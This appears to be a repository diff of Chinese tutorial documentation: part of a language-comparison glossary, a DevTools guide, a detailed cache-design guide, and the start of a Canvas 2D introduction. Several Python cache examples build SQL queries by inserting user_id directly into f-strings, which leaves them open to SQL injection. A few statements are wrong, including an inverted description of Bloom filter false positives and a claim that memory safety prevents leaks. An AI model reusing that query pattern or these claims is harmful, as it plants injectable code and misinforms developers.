2. **Go**:学习并发和类型系统
3. **Java**:理解企业级开发
#### 前端转全栈
1. **Node.js**:利用前端知识
2. **TypeScript**:类型安全
3. **Go**:后端性能优化
#### 后端工程师
1. **Java**:企业级开发
2. **Go**:云原生架构
3. **Rust**:系统编程(进阶)
### 9.3 未来趋势
#### 云原生时代
- **Go** 和 **Rust** 将继续崛起
- **Java** 仍会保持企业级地位
- **Node.js** 继续统治全栈领域
#### AI 时代
- **Python** 统治 AI 训练
- **C++/Rust** 负责模型部署
- **Go** 负责云基础设施
#### WebAssembly 时代
- **Rust** 将成为 WebAssembly 首选语言
- **前端** 和 **后端** 的界限会进一步模糊
### 9.4 最后的建议
1. **不要过度纠结语言选择**
- 大多数情况下,Java、Python、Go、Node.js 都能胜任
- 架构设计比语言选择更重要
2. **深度 > 广度**
- 精通 1-2 门语言 > 了解 10 门语言
- 深入理解语言背后的原理(内存管理、并发模型)
3. **保持开放心态**
- 每年都有新语言诞生
- 学习新语言能拓宽思维
- 但不要盲目追新
4. **关注生态,不只是语言**
- 好的框架、库、工具比语言本身更重要
- 社区活跃度决定了长期可维护性
---
## 10. 名词速查表 (Glossary)
| 名词 | 全称 | 解释 |
| :---------------- | :-------------------------------- | :--------------------------------------------------- |
| **JVM** | Java Virtual Machine | Java 虚拟机,实现"一次编译,到处运行" |
| **GC** | Garbage Collection | 垃圾回收,自动管理内存 |
| **GIL** | Global Interpreter Lock | Python 全局解释器锁,限制多线程性能 |
| **Goroutine** | - | Go 语言的轻量级线程(协程) |
| **NPM** | Node Package Manager | Node.js 的包管理器,世界最大的包仓库 |
| **Pip** | Pip Installs Packages | Python 的包管理器 |
| **Maven** | - | Java 的项目管理和构建工具 |
| **ORM** | Object-Relational Mapping | 对象关系映射,用面向对象方式操作数据库 |
| **STW** | Stop-The-World | 垃圾回收时的暂停时间 |
| **JIT** | Just-In-Time Compilation | 即时编译,提高运行时性能 |
| **Type Safety** | - | 类型安全,编译时检查类型错误 |
| **Memory Safe** | - | 内存安全,编译时保证无内存泄漏 |
| **Concurrency** | - | 并发,同时处理多个任务 |
| **Parallelism** | - | 并行,真正同时执行多个任务 |
| **Async/Await** | - | 异步编程语法,简化异步代码编写 |
| **Event Loop** | - | 事件循环,Node.js 的并发模型 |
| **I/O Bound** | - | I/O 密集型,瓶颈在网络/磁盘操作 |
| **CPU Bound** | - | CPU 密集型,瓶颈在计算 |
docs/zh-cn/appendix/browser-devtools/index.md
+14 -1
View File
@@ -9,6 +9,7 @@
**DevTools** 是现代浏览器(Chrome, Edge, Firefox, Safari 等)内置的一套 Web 开发和调试工具。对于开发者来说,它比代码编辑器更接近“真相”,因为**它展示的是代码在浏览器中实际运行的样子**。
**如何打开 DevTools**
- **快捷键**`F12``Ctrl + Shift + I` (Mac: `Cmd + Option + I`)
- **鼠标**:在网页任意元素上**右键点击**,选择 **“检查 (Inspect)”**。
- **菜单**:浏览器右上角菜单 -> 更多工具 -> 开发者工具。
@@ -29,6 +30,7 @@
DevTools 最强大的功能之一就是**实时修改**。下方的演示包含了一个“虚拟网页”(上方)和一个“DevTools”(下方)。
**请尝试:**
1. 在下方的 Elements 面板中,点击 DOM 树中的 `h1``button` 元素。
2. 在右侧的 Styles 面板中,修改 `element.style` 中的属性值(例如将 `color` 改为 `red`)。
3. 观察上方的虚拟网页如何**实时发生变化**。
@@ -50,17 +52,20 @@ DevTools 最强大的功能之一就是**实时修改**。下方的演示包含
你可能会发现,当你刷新页面后,所有的修改都消失了,网页又变回了原来的样子。
这是因为 DevTools 的修改仅仅发生在**你的浏览器本地内存**中。
- 当你访问网页时,浏览器从**远程服务器**下载了 HTML 代码并在本地渲染出来。
- 你修改的只是**本地的副本**,并没有权限去修改服务器上的**源代码**。
- 所以每次刷新,浏览器都会重新去服务器拉取最新的(未被修改的)代码,一切就复原了。
:::
:::
---
## 3. 核心面板详解
### 3.1 Elements (元素面板)
**作用**:查看和实时编辑页面的 HTML 和 CSS。
- **左侧 (DOM 树)**:显示网页的 HTML 结构。你可以双击标签或文本进行修改,甚至拖拽节点改变位置。
- **右侧 (Styles)**:显示选中元素的 CSS 样式。你可以勾选/取消样式查看变化,或者直接修改数值(如颜色、边距)。
- **应用场景**
@@ -68,7 +73,9 @@ DevTools 最强大的功能之一就是**实时修改**。下方的演示包含
- "我想试试这个标题变成红色好看吗?" -> 直接在 Styles 里修改 `color: red`
### 3.2 Console (控制台面板)
**作用**:查看日志信息,运行 JavaScript 代码。
- **日志输出**:网页运行时的 `console.log()` 信息、警告(黄色)和报错(红色)都会显示在这里。
- **交互环境**:你可以在这里输入任意 JS 代码并立即执行。例如输入 `alert('Hello')` 会弹窗,输入 `document.body.style.background = 'red'` 会把背景变红。
- **应用场景**
@@ -76,7 +83,9 @@ DevTools 最强大的功能之一就是**实时修改**。下方的演示包含
- "验证一个 JS 函数的返回值。" -> 直接在控制台运行测试。
### 3.3 Network (网络面板)
**作用**:监控所有网络请求。
- **列表视图**:显示加载的所有资源(HTML, CSS, JS, 图片, 接口请求)。
- **交互详情**:点击任意请求行,右侧会滑出详情面板:
- **Headers (标头)**:查看请求头、响应头(如 `Content-Type`)。
@@ -91,13 +100,17 @@ DevTools 最强大的功能之一就是**实时修改**。下方的演示包含
- "页面加载为什么这么慢?" -> 找哪个图片或文件加载时间最长。
### 3.4 Sources (源代码面板)
**作用**:查看源代码,调试 JavaScript。
- **断点调试**:点击行号可以设置“断点 (Breakpoint)”。当代码执行到这一行时会**暂停**,让你有机会查看当前的变量值,并单步执行代码。
- **应用场景**
- "代码逻辑哪里出错了?" -> 打断点,一步步看着代码跑,看变量值是否符合预期。
### 3.5 Application (应用面板)
**作用**:查看和管理浏览器存储。
- **Storage**
- **Local Storage**:持久化存储的数据。
- **Session Storage**:会话级存储(关闭标签页消失)。
docs/zh-cn/appendix/cache-design.md
+833
View File
@@ -0,0 +1,833 @@
# 系统缓存设计:从原理到实战 (Interactive Guide to Caching)
> 💡 **学习指南**:本章节带你深入理解后端系统的"加速器"——缓存。我们将从最基础的"为什么要缓存"讲起,一步步掌握多级缓存架构、缓存模式、以及实战中的坑与解决方案。
<CacheArchitectureDemo />
## 0. 引言:看不见的"加速器"
你刷朋友圈时,为什么几秒钟就能加载出几百张图片?
你查询订单时,为什么瞬间就能看到几个月前的数据?
这背后都有一个功臣:**缓存 (Cache)**。
如果数据库是"仓库",那缓存就是"柜台"。
常用的商品(热数据)放在柜台上,随拿随用;不常用的商品才需要去仓库里找。
### 0.1 为什么要缓存?
只有一个理由:**快**。
| 存储介质 | 访问延迟 | 吞吐量 | 典型用途 |
| :--------------- | :------- | :----- | :------------- |
| **L1 CPU 缓存** | ~1 ns | 极高 | 寄存器、变量 |
| **内存 (Redis)** | ~100 ns | 高 | 热点数据、会话 |
| **SSD 数据库** | ~1 ms | 中 | 持久化存储 |
| **HDD 数据库** | ~10 ms | 低 | 归档存储 |
**关键点**:缓存的本质是**用空间换时间**,通过在更快的存储介质中保留数据副本,减少访问慢速存储的次数。
---
## 1. 第一步:理解缓存的本质
### 1.1 局部性原理 (Locality Principle)
缓存之所以有效,是因为两个神奇的观察:
1. **时间局部性 (Temporal Locality)**
- 如果你现在访问了某个数据,未来很可能**再次访问它**。
- _例子_:一个用户登录后,接下来几分钟的每次请求都需要查询他的用户信息。
2. **空间局部ity (Spatial Locality)**
- 如果你访问了某个数据,很可能**访问它附近的数据**。
- _例子_:浏览商品列表时,通常会翻到下一页(相邻的商品)。
<LocalityPrincipleDemo />
### 1.2 缓存的生命周期
一个缓存条目(Cache Entry)的一生:
1. **写入 (Write)**:首次访问数据时,从数据库读取并存入缓存。
2. **命中 (Hit)**:后续访问直接从缓存返回(快!)。
3. **过期 (Expiration)**:超过设定时间(TTL),标记为过期。
4. **淘汰 (Eviction)**:缓存满了,需要腾空间给新数据。
<CacheLifecycleDemo />
**关键点**:好的缓存设计需要平衡**命中率**(Hit Ratio)和**内存占用**。
---
## 2. 单机缓存 vs 分布式缓存
### 2.1 本地缓存 (Local Cache)
缓存和应用在同一个进程里。
- **优点**
- 极快(没有网络开销)。
- 简单(就是一个 Map/Dictionary)。
- **缺点**
- 容量有限(受限于单机内存)。
- 不一致(每个实例的缓存独立)。
- **典型实现**
- Java: Caffeine、Guava Cache
- Go: bigcache、ristretto
- Python: functools.lru_cache
```java
// Java Caffeine 示例
Cache<String, User> userCache = Caffeine.newBuilder()
.maximumSize(10_000) // 最多存 1 万条
.expireAfterWrite(10, TimeUnit.MINUTES) // 10 分钟过期
.build();
// 使用
User user = userCache.get(userId, key -> {
// 缓存没命中,从数据库查
return database.getUserById(key);
});
```
### 2.2 分布式缓存 (Distributed Cache)
缓存是一个独立的服务,应用通过网络访问。
- **优点**
- 容量巨大(可以集群扩展)。
- 一致性好(所有实例共享同一份缓存)。
- **缺点**
- 有网络延迟(通常 1-5 ms)。
- 需要额外维护缓存服务。
- **典型实现****Redis**、Memcached
```python
# Python + Redis 示例
import redis
r = redis.Redis(host='localhost', port=6379)
def get_user(user_id):
# 先查缓存
cached = r.get(f'user:{user_id}')
if cached:
return json.loads(cached)
# 缓存未命中,查数据库
user = db.query(f'SELECT * FROM users WHERE id = {user_id}')
# 写入缓存,过期时间 10 分钟
r.setex(f'user:{user_id}', 600, json.dumps(user))
return user
```
<LocalVsDistributedCacheDemo />
**关键点**:现代系统通常**组合使用**——本地缓存做第一道防线,分布式缓存做第二道防线。
---
## 3. 多级缓存架构 (Multi-Level Caching)
真实的系统通常是"多层防御":
```
用户请求
浏览器缓存 (Cache-Control)
↓ (未命中)
CDN 缓存 (静态资源)
↓ (未命中)
负载均衡器
应用服务器 (本地缓存: Caffeine)
↓ (未命中)
分布式缓存 (Redis)
↓ (未命中)
数据库 (MySQL / PostgreSQL)
```
### 3.1 每一层的特点
| 层级 | 存储介质 | 典型容量 | 响应时间 | 适用场景 |
| :------------- | :--------- | :------- | :------- | :------------------------- |
| **浏览器缓存** | 用户磁盘 | ~100 MB | ~0 ms | 静态资源(图片、CSS、JS) |
| **CDN 缓存** | 边缘节点 | TB 级 | ~10 ms | 静态文件、API 响应 |
| **本地缓存** | 应用内存 | ~1 GB | ~1 ms | 极热点数据(配置、白名单) |
| **Redis 缓存** | Redis 集群 | ~100 GB | ~5 ms | 热点数据(用户信息、商品) |
| **数据库** | SSD/HDD | TB ~ PB | ~50 ms | 持久化存储 |
<MultiLevelCacheDemo />
**关键点**:每一层都是上一层的"保护伞",逐级过滤请求,最终打到数据库的流量可能只有原来的 **1%**
---
## 4. 缓存模式 (Caching Patterns)
### 4.0 为什么需要缓存模式?
**问题场景**
当有大量请求访问内部系统时,如果每个请求都需要操作数据库(例如查询操作),对于那种基本不变化的数据来说,每次都去数据库查询会极大地消耗性能。
尤其是在海量数据操作时,如果都从 DB 加载,这是在挑战用户的耐性。
**生活中的例子**
想象你要去小区里了解某个人在不在家。当没有通讯工具时:
- **没有缓存**:每次都要经过小区保安,再到具体单元楼,最终到这家门口,才知道在不在家。
- **有缓存**:如果换一个优秀的保安,他知道当前小区特定的家里是否有人,直接问保安就知道了,无需跑冤枉路。
这个"优秀保安"就是**缓存**。每次访问时先访问缓存,就能极大提高访问效率和系统性能。
### 4.1 Cache-Aside (旁路缓存) ⭐ 最常用
最常用的模式,由**应用代码**直接控制缓存。
#### 读取流程
```
1. 应用读取缓存
↓ 命中?
├─ 是 → 直接返回数据
└─ 否 → 读取数据库
将数据写入缓存
返回数据
```
**代码示例**
```python
def get_user(user_id):
# 1. 先查缓存
cached = cache.get(f'user:{user_id}')
if cached:
return cached
# 2. 缓存未命中,查数据库
user = db.query(f'SELECT * FROM users WHERE id = {user_id}')
# 3. 将数据写入缓存
if user:
cache.set(f'user:{user_id}', user, ttl=600)
return user
```
#### 更新流程
```
1. 应用更新数据库
2. 删除缓存(不是更新!)
```
**代码示例**
```python
def update_user(user_id, new_data):
# 1. 更新数据库
db.execute('UPDATE users SET ... WHERE id = ?', user_id)
# 2. 删除缓存(而不是更新)
cache.delete(f'user:{user_id}')
# 为什么删除而不是更新?
# 因为并发更新时,更新缓存的顺序可能和数据库不一致!
```
**关键点**
-**删除而非更新**:避免并发写入导致缓存和数据库不一致
-**延迟双删**:为了极致一致性,可以在更新前再删一次
-**最灵活**:应用代码完全控制缓存逻辑
**常见问题:会不会有脏数据?**
场景:一个查询操作发现缓存没数据,准备去查 DB。此时另一个写操作更新了 DB 并删除了缓存,第一个操作从 DB 拿到的还是老数据并写入缓存。
**解答**:这种情况出现的概率极低!
- 写操作需要锁表
- 数据库写入比读取慢
- 同等条件下,查询操作先返回,写操作再返回
### 4.2 Read-Through (读穿透)
由**缓存服务**负责与数据库交互,应用代码只和缓存打交道。
#### 工作原理
```
应用请求 → 缓存服务
缓存命中?
├─ 是 → 直接返回
└─ 否 → 缓存服务自己加载 DB 数据
更新缓存
返回数据
```
**代码示例**
```python
# 应用代码只需要
user = cache.get(user_id) # 缓存库自动处理数据库查询
# 不需要手写:
# if not cached:
# user = db.query(...)
# cache.set(user_id, user)
```
**对比 Cache-Aside**
| 特性 | Cache-Aside | Read-Through |
| :------------- | :--------------- | :----------------------- |
| **谁负责加载** | 应用代码 | 缓存服务 |
| **代码复杂度** | 需要手写缓存逻辑 | 简洁,只需调用 get |
| **灵活性** | 高(完全控制) | 低(依赖缓存库实现) |
| **适用场景** | 通用场景 | 读多写少,缓存逻辑标准化 |
**优点**
- 代码简洁,缓存逻辑对业务透明
- 统一的缓存加载策略
**缺点**
- 灵活性差,缓存库和数据库强绑定
- 需要特殊的缓存库支持
### 4.3 Write-Through (写穿透)
更新时**同时**写缓存和数据库,由缓存服务负责同步。
#### 工作原理
```
应用写请求 → 缓存服务
更新缓存
同步更新数据库
返回成功
```
**代码示例**
```python
# 应用代码只需要
cache.set(user_id, user) # 缓存库自动同步到数据库
# 不需要手写:
# db.update(user)
# cache.set(user_id, user)
```
**关键点**
- 缓存和数据库**同步更新**,强一致性
- 写入性能受数据库影响(相对较慢)
**对比 Cache-Aside**
| 特性 | Cache-Aside | Write-Through |
| :----------- | :----------------- | :-------------- |
| **写操作** | 先写 DB,再删缓存 | 同时写缓存和 DB |
| **一致性** | 最终一致 | 强一致 |
| **写入性能** | 高(异步删缓存) | 低(同步写 DB) |
| **缓存更新** | 懒加载(读时更新) | 主动更新 |
**优点**
- 数据一致性最好
- 读取时总能命中缓存
**缺点**
- 写入延迟高
- 需要特殊的缓存库支持
### 4.4 Write-Behind (异步写回) ⚡ 最快
更新时**只写缓存**,缓存服务异步批量更新数据库。
#### 工作原理
```
应用写请求 → 缓存服务
更新缓存(立即返回)
⚡ 异步批量写数据库(后台进行)
```
**代码示例**
```python
# 应用代码只需要
cache.set(user_id, user) # 立即返回,不等待数据库
# 缓存服务会在后台批量写入:
# while True:
# batch = cache.get_dirty_entries()
# db.batch_update(batch)
```
**性能对比**
| 模式 | 写入延迟 | 吞吐量 | 数据一致性 |
| :---------------- | :------- | :----------- | :--------- |
| **直接写 DB** | ~50 ms | ~1000 QPS | 强一致 |
| **Write-Through** | ~50 ms | ~1000 QPS | 强一致 |
| **Cache-Aside** | ~50 ms | ~1000 QPS | 最终一致 |
| **Write-Behind** | ~1 ms | ~100,000 QPS | 可能丢失 |
**优点**
- ✅ 写入极快(毫秒级响应)
- ✅ 吞吐量极高(十万级 QPS
- ✅ 减少数据库 IO(批量写入)
**缺点**
- ❌ 数据可能丢失(缓存崩了,数据就没了)
- ❌ 缓存和数据库不一致(异步延迟)
**适用场景**
- ✅ 秒杀系统(库存扣减)
- ✅ 点赞数、浏览量(可接受少量丢失)
- ✅ 计数器、统计信息
- ❌ 订单、支付(绝对不能丢)
### 4.5 四种模式对比总结
| 模式 | 谁控制缓存 | 读取策略 | 写入策略 | 一致性 | 性能 | 使用频率 |
| :---------------- | :--------- | :------- | :------------------ | :------- | :--- | :---------------- |
| **Cache-Aside** | 应用代码 | 懒加载 | 先写 DB,删缓存 | 最终一致 | 中 | ⭐⭐⭐⭐⭐ 最常用 |
| **Read-Through** | 缓存服务 | 自动加载 | 先写 DB,删缓存 | 最终一致 | 中 | ⭐⭐ |
| **Write-Through** | 缓存服务 | 自动加载 | 同时写缓存和 DB | 强一致 | 低 | ⭐⭐ |
| **Write-Behind** | 缓存服务 | 自动加载 | 只写缓存,异步写 DB | 可能丢失 | 极高 | ⭐⭐⭐ |
**选择建议**
- **大多数场景**:使用 **Cache-Aside**,灵活且成熟
- **读多写少**:考虑 **Read-Through**,简化代码
- **强一致性要求**:考虑 **Write-Through**
- **海量写入,可接受丢失**:使用 **Write-Behind**
<CachePatternsDemo />
---
## 5. 缓存的"坑"与解决方案
### 5.1 缓存穿透 (Cache Penetration)
**问题**:查询一个**不存在的数据**(如恶意请求 id=-1),缓存没有,数据库也没有。导致每次请求都直接打到数据库。
**解决方案**
1. **布隆过滤器 (Bloom Filter)**
- 在缓存前加一层过滤器,快速判断"这个 id **肯定不存在**"。
- 100% 判断不存在,但可能有**误判**(说不存在实际存在)。
```python
# 布隆过滤器示例
from pybloom_live import BloomFilter
# 预热:把所有有效的 user_id 放进去
bf = BloomFilter(capacity=1000000, error_rate=0.001)
for user_id in all_valid_user_ids:
bf.add(user_id)
def get_user(user_id):
# 第一道防线:布隆过滤器
if user_id not in bf:
return None # 肯定不存在,直接返回
# 第二道防线:缓存
cached = cache.get(f'user:{user_id}')
if cached is not None:
return cached
# 第三道防线:数据库
user = db.get_user(user_id)
if user:
cache.set(f'user:{user_id}', user)
else:
# 即使数据库没有,也缓存一个空值(防止穿透)
cache.set(f'user:{user_id}', NULL, ttl=60)
return user
```
2. **缓存空对象**
- 查询不存在时,缓存一个 NULL 值(TTL 设置短一点,如 5 分钟)。
### 5.2 缓存击穿 (Cache Breakdown)
**问题**:某个**热点数据**过期(如微博热搜),瞬间几百万请求同时打到数据库。
**解决方案**
1. **互斥锁 (Mutex Lock)**
- 只允许一个线程查数据库,其他线程等待。
```python
import threading
lock = threading.Lock()
def get_user(user_id):
cached = cache.get(f'user:{user_id}')
if cached:
return cached
# 缓存未命中,尝试获取锁
if lock.acquire(blocking=False):
try:
# 只有拿到锁的线程才查数据库
user = db.get_user(user_id)
cache.set(f'user:{user_id}', user, ttl=600)
return user
finally:
lock.release()
else:
# 没拿到锁,等待一下再重试
time.sleep(0.01)
return get_user(user_id) # 递归重试
```
2. **逻辑过期 (Logical Expiration)**
- 不设置 TTL,而是在 value 里存一个过期时间字段。
- 查询时发现"逻辑过期",异步更新缓存,同时返回旧数据。
### 5.3 缓存雪崩 (Cache Avalanche)
**问题**:大量缓存**同时过期**(如系统重启后,所有缓存都在 00:00:00 过期),数据库瞬间被打爆。
**解决方案**
1. **随机 TTL**
- 避免同时过期,TTL 加上随机值。
```python
import random
ttl = 600 + random.randint(-60, 60) # 600 ± 60 秒
cache.set(f'user:{user_id}', user, ttl=ttl)
```
2. **缓存预热**
- 系统启动时,主动加载热点数据到缓存。
- 使用定时任务,提前刷新即将过期的热点数据。
3. **熔断降级**
- 当数据库压力过大时,暂时停止更新缓存,直接返回降级数据(如"系统繁忙,请稍后再试")。
<CacheProblemsDemo />
---
## 6. 缓存的一致性策略
缓存是副本,副本和主本(数据库)可能不一致。如何保证一致性?
### 6.1 数据更新流程
假设你要更新用户信息:
```python
# 方案 1:先更新数据库,再更新缓存
db.update(user)
cache.set(user) # ⚠️ 问题:如果缓存更新失败,就不一致了
# 方案 2:先删除缓存,再更新数据库
cache.delete(user)
db.update(user) # ⚠️ 问题:删除和更新之间,有并发读,读到了旧数据并写回缓存
# 方案 3:先更新数据库,再删除缓存(推荐)
db.update(user)
cache.delete(user) # ✅ 最佳实践
```
**为什么删除而不是更新?**
假设两个线程同时更新:
| 时间 | 线程 A | 线程 B | 数据库 | 缓存 |
| :--- | :--------------- | :--------------- | :----- | :---- |
| 1 | 读 user (age=20) | | 20 | 20 |
| 2 | | 读 user (age=20) | 20 | 20 |
| 3 | 更新 age=25 | | 25 | 20 |
| 4 | | 更新 age=30 | 30 | 20 |
| 5 | 写缓存 (age=25) | | 30 | 25 ❌ |
| 6 | | 写缓存 (age=30) | 30 | 30 ✅ |
如果是**删除缓存**,则不存在这个问题。
### 6.2 延迟双删 (Delayed Double Deletion)
为了极致一致性,可以在更新数据库前后都删除缓存:
```python
def update_user(user_id, new_data):
# 1. 第一次删除缓存
cache.delete(f'user:{user_id}')
# 2. 更新数据库
db.update(user_id, new_data)
# 3. 延迟几百毫秒后,再次删除缓存
# (为了删除在步骤 1-2 之间被写入的旧数据)
time.sleep(0.5)
cache.delete(f'user:{user_id}')
```
### 6.3 订阅 Binlog (Canal / Debezium)
最完美的方案:**把缓存更新从应用代码中剥离**。
- 监听 MySQL 的 Binlog(变更日志)。
- 数据库更新后,异步消费 Binlog,更新/删除缓存。
- **优点**:代码解耦,最终一致性保证。
<CacheConsistencyDemo />
---
## 7. 实战:设计一个高性能缓存系统
### 7.1 需求分析
我们要设计一个"商品详情页"的缓存系统:
- **读多写少**:100 次浏览,1 次编辑。
- **热点集中**:20% 的商品占 80% 的访问。
- **可接受短时不一致**:价格延迟 1 秒更新没问题。
### 7.2 架构设计
```
客户端
[本地缓存: Caffeine]
- 容量: 1000 个商品
- TTL: 30 秒
- 用途: 极热点商品(如秒杀活动)
↓ (未命中)
[分布式缓存: Redis Cluster]
- 容量: 100 万个商品
- TTL: 5 分钟
- 用途: 所有商品数据
↓ (未命中)
[数据库: MySQL]
- 持久化存储
```
### 7.3 代码实现
```java
@Service
public class ProductService {
// 本地缓存
private final Cache<String, Product> localCache;
// Redis 客户端
@Autowired
private RedisTemplate<String, Product> redisTemplate;
// 数据库
@Autowired
private ProductMapper productMapper;
/**
* 三级缓存查询
*/
public Product getProduct(String productId) {
// L1: 本地缓存
Product product = localCache.getIfPresent(productId);
if (product != null) {
return product;
}
// L2: Redis 缓存
product = redisTemplate.opsForValue().get("product:" + productId);
if (product != null) {
localCache.put(productId, product); // 回填本地缓存
return product;
}
// L3: 数据库
synchronized (this) { // 防止缓存击穿
// 双重检查
product = redisTemplate.opsForValue().get("product:" + productId);
if (product != null) {
return product;
}
// 查数据库
product = productMapper.selectById(productId);
if (product == null) {
// 缓存空对象(防止缓存穿透)
redisTemplate.opsForValue().set(
"product:" + productId,
NULL_PRODUCT,
5,
TimeUnit.MINUTES
);
return null;
}
// 写入缓存(带随机 TTL,防止雪崩)
int ttl = 300 + ThreadLocalRandom.current().nextInt(-30, 30);
redisTemplate.opsForValue().set("product:" + productId, product, ttl, TimeUnit.SECONDS);
localCache.put(productId, product);
return product;
}
}
/**
* 更新商品(Cache-Aside 模式)
*/
public void updateProduct(Product product) {
// 1. 更新数据库
productMapper.updateById(product);
// 2. 删除缓存(而不是更新)
redisTemplate.delete("product:" + product.getId());
localCache.invalidate(product.getId());
// 3. (可选)延迟双删
CompletableFuture.runAsync(() -> {
try {
Thread.sleep(500);
redisTemplate.delete("product:" + product.getId());
} catch (InterruptedException e) {
Thread.currentThread().interrupt();
}
});
}
}
```
### 7.4 监控与调优
```java
@RestController
public class CacheMetricsController {
@Autowired
private Cache localCache;
@GetMapping("/cache/stats")
public Map<String, Object> getCacheStats() {
CacheStats stats = localCache.stats();
return Map.of(
"hitRate", stats.hitRate(), // 命中率(目标: > 90%
"hitCount", stats.hitCount(), // 命中次数
"missCount", stats.missCount(), // 未命中次数
"evictionCount", stats.evictionCount(), // 淘汰次数
"averageLoadPenalty", stats.averageLoadPenalty() // 平均加载耗时 (ns)
);
}
}
```
**关键指标**
- **命中率 (Hit Rate)**> 90% 为优秀。
- **平均加载耗时 (Average Load Penalty)**:未命中时加载数据的平均时间,越小越好。
- **淘汰次数 (Eviction Count)**:过高说明缓存容量不足。
<ProductCacheDemo />
---
## 8. 总结与学习路线
缓存设计是后端系统的"核心技能",掌握它能让你的系统性能提升 **10-100 倍**
### 8.1 核心知识点
| 知识点 | 重要程度 | 难度 | 实战频率 |
| :--------------------- | :--------- | :--- | :------- |
| **多级缓存架构** | ⭐⭐⭐⭐⭐ | 中 | 极高 |
| **Cache-Aside 模式** | ⭐⭐⭐⭐⭐ | 低 | 极高 |
| **缓存穿透/击穿/雪崩** | ⭐⭐⭐⭐⭐ | 高 | 高 |
| **布隆过滤器** | ⭐⭐⭐⭐ | 中 | 中 |
| **缓存一致性** | ⭐⭐⭐⭐ | 高 | 高 |
| **分布式锁** | ⭐⭐⭐⭐ | 中 | 中 |
| **缓存监控与调优** | ⭐⭐⭐⭐ | 中 | 高 |
### 8.2 学习路线
1. **入门**1-2 天):
- 理解缓存的本质和局部性原理。
- 使用 Redis 做简单的键值缓存。
- 掌握 Cache-Aside 模式。
2. **进阶**1 周):
- 实现多级缓存(本地缓存 + Redis)。
- 解决缓存三大问题(穿透、击穿、雪崩)。
- 学习布隆过滤器、分布式锁。
3. **实战**2-4 周):
- 设计一个高并发的商品详情页缓存系统。
- 接入监控系统,实时观测缓存命中率。
- 压测验证性能提升。
4. **深入**(持续):
- 学习 Redis 高可用(哨兵、集群)。
- 研究热点数据的自动识别与预热。
- 探索一致性哈希、缓存分片算法。
### 8.3 推荐资源
- **书籍**
- 《Redis 设计与实现》(Huangz
- 《高性能 MySQL》(第 5 章:缓存)
- **文章**
- Redis 官方文档: https://redis.io/docs/
- Google 的《缓存设计指南》
- **工具**
- Redis Desktop Manager (Redis 可视化)
- JMeter (压测工具)
---
## 9. 名词速查表 (Glossary)
| 名词 | 全称 | 解释 |
| :--------------------- | :------------------ | :------------------------------------------------------------------------------- |
| **Cache** | - | **缓存**。存储数据副本的快速存储层,用于加速访问。 |
| **Hit Ratio** | - | **命中率**。缓存命中的请求数占总请求数的比例(目标: > 90%)。 |
| **TTL** | Time To Live | **生存时间**。缓存条目的过期时间。 |
| **Cache Penetration** | - | **缓存穿透**。查询不存在的数据,导致请求直接打到数据库。 |
| **Cache Breakdown** | - | **缓存击穿**。热点数据过期,瞬间大量请求打到数据库。 |
| **Cache Avalanche** | - | **缓存雪崩**。大量缓存同时过期,数据库压力骤增。 |
| **Bloom Filter** | - | **布隆过滤器**。空间效率高的概率型数据结构,用于判断"一个元素是否在一个集合中"。 |
| **Eviction** | - | **淘汰**。缓存满了时,删除旧数据为新数据腾空间。 |
| **LRU** | Least Recently Used | **最近最少使用**。常见的缓存淘汰策略。 |
| **Cache-Aside** | - | **旁路缓存**。应用代码直接操作缓存和数据库的模式。 |
| **Read-Through** | - | **读穿透**。缓存库自动从数据库加载数据。 |
| **Write-Through** | - | **写穿透**。写入缓存时同步写入数据库。 |
| **Write-Behind** | - | **异步写回**。写入缓存后异步批量写数据库,性能高但可能丢失数据。 |
| **Consistent Hashing** | - | **一致性哈希**。分布式缓存中用于数据分片的算法。 |
| **Local Cache** | - | **本地缓存**。与应用在同一进程内的缓存(如 Caffeine)。 |
| **Distributed Cache** | - | **分布式缓存**。独立服务,通过网络访问(如 Redis)。 |
docs/zh-cn/appendix/canvas-intro.md
+959
View File
@@ -0,0 +1,959 @@
# Canvas 2D 入门:从像素到动画 (Interactive Guide to Canvas)
> **学习指南**:本章节无需深厚的前端基础,通过交互式演示带你掌握 Canvas 2D 的核心原理和实践技巧。我们将从最基础的绘制开始,一直到构建复杂的交互式图形应用。
## 0. 引言:Canvas 是什么
Canvas(画布)是 HTML5 提供的一个通过 JavaScript 绘制 2D 图形的元素。你可以把它想象成一张**数字画布**,上面可以用代码"画"出任何东西:简单的形状、复杂的图表、流畅的动画,甚至是完整的游戏。
### 0.1 Canvas vs SVG:有什么区别?
在 Web 开发中,绘制图形主要有两种方式:Canvas 和 SVGScalable Vector Graphics)。它们各有优劣:
| 特性 | Canvas | SVG |
| :--- | :--- | :--- |
| **类型** | 位图(光栅图形) | 矢量图形 |
| **DOM** | 单个 `<canvas>` 元素 | 每个图形都是 DOM 元素 |
| **交互** | 需要手动计算碰撞 | 天然支持事件绑定 |
| **性能** | 适合大量对象 | 适合少量复杂对象 |
| **缩放** | 放大会失真 | 无限缩放不失真 |
| **应用** | 游戏、数据可视化 | 图标、插画 |
**简单总结**
- **Canvas** = 像素画,画完就变成像素,性能好但交互麻烦
- **SVG** = 矢量图,每个图形都是对象,交互方便但对象多了会慢
### 0.2 Canvas 的应用场景
Canvas 的用途非常广泛,你可能在很多地方都见过它:
1. **数据可视化**:折线图、饼图、热力图(如 ECharts、Chart.js
2. **游戏开发**:网页游戏(如 Phaser.js 引擎)
3. **图像处理**:图片裁剪、滤镜、拼图(如 Fabric.js)
4. **创意效果**:粒子特效、动画背景(如 Three.js 的 2D 渲染)
5. **工程绘图**CAD、流程图、思维导图
---
## 1. Canvas 基础
### 1.1 Canvas 元素和上下文
使用 Canvas 的第一步是在 HTML 中创建一个 `<canvas>` 元素:
```html
<canvas id="myCanvas" width="600" height="400"></canvas>
```
然后通过 JavaScript 获取**渲染上下文(Rendering Context**
```javascript
const canvas = document.getElementById('myCanvas')
const ctx = canvas.getContext('2d') // 获取 2D 上下文
```
**关键概念**
- `canvas` 是 DOM 元素,控制画布的大小和位置
- `ctx` 是绘图工具,所有的绘制操作都通过它完成
- `'2d'` 表示使用 2D 渲染上下文(WebGL 使用 `'webgl'`
> 🕹️ **交互演示**:点击下方按钮,体验 Canvas 的基本绘图操作。
<CanvasBasicsDemo />
### 1.2 坐标系统
Canvas 使用的是**屏幕坐标系**,这与传统数学坐标系有所不同:
- **原点 (0, 0)**:在左上角(不是中心)
- **X 轴**:向右为正方向
- **Y 轴**:向下为正方向(注意:数学坐标系中 Y 轴向上)
- **单位**:像素(px
```javascript
// 在左上角绘制一个点
ctx.fillRect(0, 0, 10, 10)
// 在右下角绘制一个点
ctx.fillRect(canvas.width - 10, canvas.height - 10, 10, 10)
```
